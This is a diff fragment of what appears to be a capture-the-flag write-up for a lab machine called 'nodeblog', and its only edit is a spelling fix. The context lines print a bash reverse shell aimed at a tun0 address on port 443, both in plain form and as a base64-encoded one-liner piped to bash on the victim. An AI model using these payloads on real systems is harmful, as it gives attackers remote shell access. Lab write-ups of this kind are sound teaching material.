isuckatlinux/isuckatlinux.github.io/_posts/2022-01-18-nodeblog-writeup.md

 ```bash
 echo 'bash -i >& /dev/tcp/{your_tun0_ip}/443 0>&1' | base64
 ```
-In the victim's machine we have to reverse the base64 format, so our final revershe shell payload is:
+In the victim's machine we have to reverse the base64 format, so our final reverse shell payload is:
 ```bash
 echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi41LzQ0MyAwPiYxCg==|base64 -d|bash
 ```